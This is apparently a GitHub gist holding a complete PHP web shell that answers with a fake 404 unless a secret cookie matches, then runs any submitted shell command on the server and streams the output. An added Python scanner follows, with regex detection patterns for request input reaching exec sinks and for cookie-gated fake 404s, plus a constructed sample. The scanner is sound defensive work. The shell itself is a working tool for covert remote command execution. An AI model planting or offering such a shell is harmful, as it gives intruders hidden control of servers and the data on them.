@koteq
Last active December 16, 2015 01:19
Simple insecure php shell
```php
<?php
// Access gate: requests that lack the expected cookie value get a fake 404.
// With $access_token left as an empty string, every request is rejected until a value is set.
$access_token = "";
if (empty($_COOKIE["access_token"]) || $_COOKIE["access_token"] !== $access_token) {
    header('HTTP/1.0 404 Not Found');
    echo "<h1>404 Not Found</h1>";
    echo "The page that you have requested could not be found.";
    die();
} else {
    // Disable caching and output buffering so command output streams to the browser as it is produced.
    header('Connection: close');
    header('X-Accel-Buffering: no');
    header('Expires: Sat, 26 Jul 1997 05:00:00 GMT');
    header('Cache-Control: no-store, no-cache, must-revalidate');
    header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
    ob_implicit_flush(true);
    ob_end_flush();
}
// Defaults for the form fields: current directory and a harmless first command.
if (empty($_POST['cwd'])) $_POST['cwd'] = '.';
if (empty($_POST['cmd'])) $_POST['cmd'] = 'pwd';
?>
<form action="" method="post">
    cwd: <input type="text" name="cwd" value="<?php echo htmlspecialchars($_POST['cwd'])?>" size="75"/><br>
    cmd: <input type="text" name="cmd" value="<?php echo htmlspecialchars($_POST['cmd'])?>" size="75"/>
    <input type="submit"/>
</form>
<div style="font: 13px Consolas, monospace; white-space: pre;">
<?php
if (!empty($_POST['cmd'])) {
    // Note: unlike the form fields above, the command is echoed back here without escaping.
    echo "$ " . $_POST['cmd'] . "\n";
    // The submitted text is passed to sh as a single quoted argument; stderr is merged into stdout.
    $cmd = "sh -c " . escapeshellarg($_POST['cmd']) . " 2>&1";
    $descriptorspec = array(
        0 => array("pipe", "r"),   // child stdin
        1 => array("pipe", "w"),   // child stdout (stderr is already redirected into it)
        2 => array("pipe", "w")    // child stderr (stays empty because of 2>&1)
    );
    // Run in the directory given by the cwd field.
    $process = proc_open($cmd, $descriptorspec, $pipes, realpath($_POST['cwd']));
    if (is_resource($process)) {
        while ($str = fgets($pipes[1])) {
            $str = htmlspecialchars($str);
            // Strip ANSI colour escape sequences from the output.
            $str = preg_replace("/\033\[[\d;]+m/", "", $str);
            echo "<span>$str</span>";
        }
        fclose($pipes[0]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        proc_close($process);
        echo "\n$";
    }
}
?>
</div>
```
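From a defender's side, the two things that make this file recognisable are request input (`$_POST`, `$_COOKIE`) reaching a command-execution sink such as `proc_open`, and a cookie gate that answers everyone else with a fake 404. The scanner below is an added example, not part of the gist: it does a crude per-line taint pass over PHP source and flags both patterns. The two PHP samples inside it are constructed for the demonstration.

```python
"""Flag web-shell indicators in PHP source: request-controlled input reaching a
command-execution sink, and a cookie gate that serves a fake 404 to everyone else."""
import re

SINK_RE = re.compile(r'\b(proc_open|shell_exec|passthru|system|exec|popen)\s*\((.*)', re.I)
TAINT_SRC_RE = re.compile(r'\$_(POST|GET|REQUEST|COOKIE|SERVER)\b')
ASSIGN_RE = re.compile(r'(\$\w+)\s*=(?!=)\s*(.*?);')      # $var = <expr>;  (not ==)
FAKE_404_RE = re.compile(r"header\(\s*['\"]HTTP/1\.[01] 404")
COOKIE_GATE_RE = re.compile(r'\$_COOKIE\[')


def scan_php(source: str):
    """Return [(line_number, rule), ...] for one PHP file (empty list if nothing found)."""
    findings = []
    tainted = set()            # variables assigned (directly or transitively) from request data
    saw_cookie_gate = False
    for lineno, line in enumerate(source.splitlines(), 1):
        if COOKIE_GATE_RE.search(line):
            saw_cookie_gate = True
        # Propagate taint through simple assignments: $x = ... $_POST[...] ...;
        m = ASSIGN_RE.search(line)
        if m:
            var, rhs = m.groups()
            if TAINT_SRC_RE.search(rhs) or any(t in rhs for t in tainted):
                tainted.add(var)
        # A sink whose argument text mentions a superglobal or a tainted variable.
        m = SINK_RE.search(line)
        if m:
            args = m.group(2)
            if TAINT_SRC_RE.search(args) or any(re.search(re.escape(t) + r'\b', args) for t in tainted):
                findings.append((lineno, f"request input reaches {m.group(1)}()"))
        # A fake 404 after a cookie check: access gating typical of dropped shells.
        if saw_cookie_gate and FAKE_404_RE.search(line):
            findings.append((lineno, "cookie-gated fake 404 response"))
    return findings


# Constructed samples for the demonstration (not taken from any real host).
SUSPECT_SAMPLE = """<?php
if (empty($_COOKIE["access_token"]) || $_COOKIE["access_token"] !== $token) {
    header('HTTP/1.0 404 Not Found');
    die();
}
$cmd = "sh -c " . escapeshellarg($_POST['cmd']) . " 2>&1";
$process = proc_open($cmd, $spec, $pipes, realpath($_POST['cwd']));
"""
BENIGN_SAMPLE = """<?php
$out = shell_exec('uptime');
echo htmlspecialchars($_POST['name']);
"""

if __name__ == "__main__":
    for name, src in (("suspect", SUSPECT_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, scan_php(src))
```

The taint pass is deliberately line-local, so it will miss input that is laundered through function calls or arrays; treat a hit as a reason to open the file, not as a verdict.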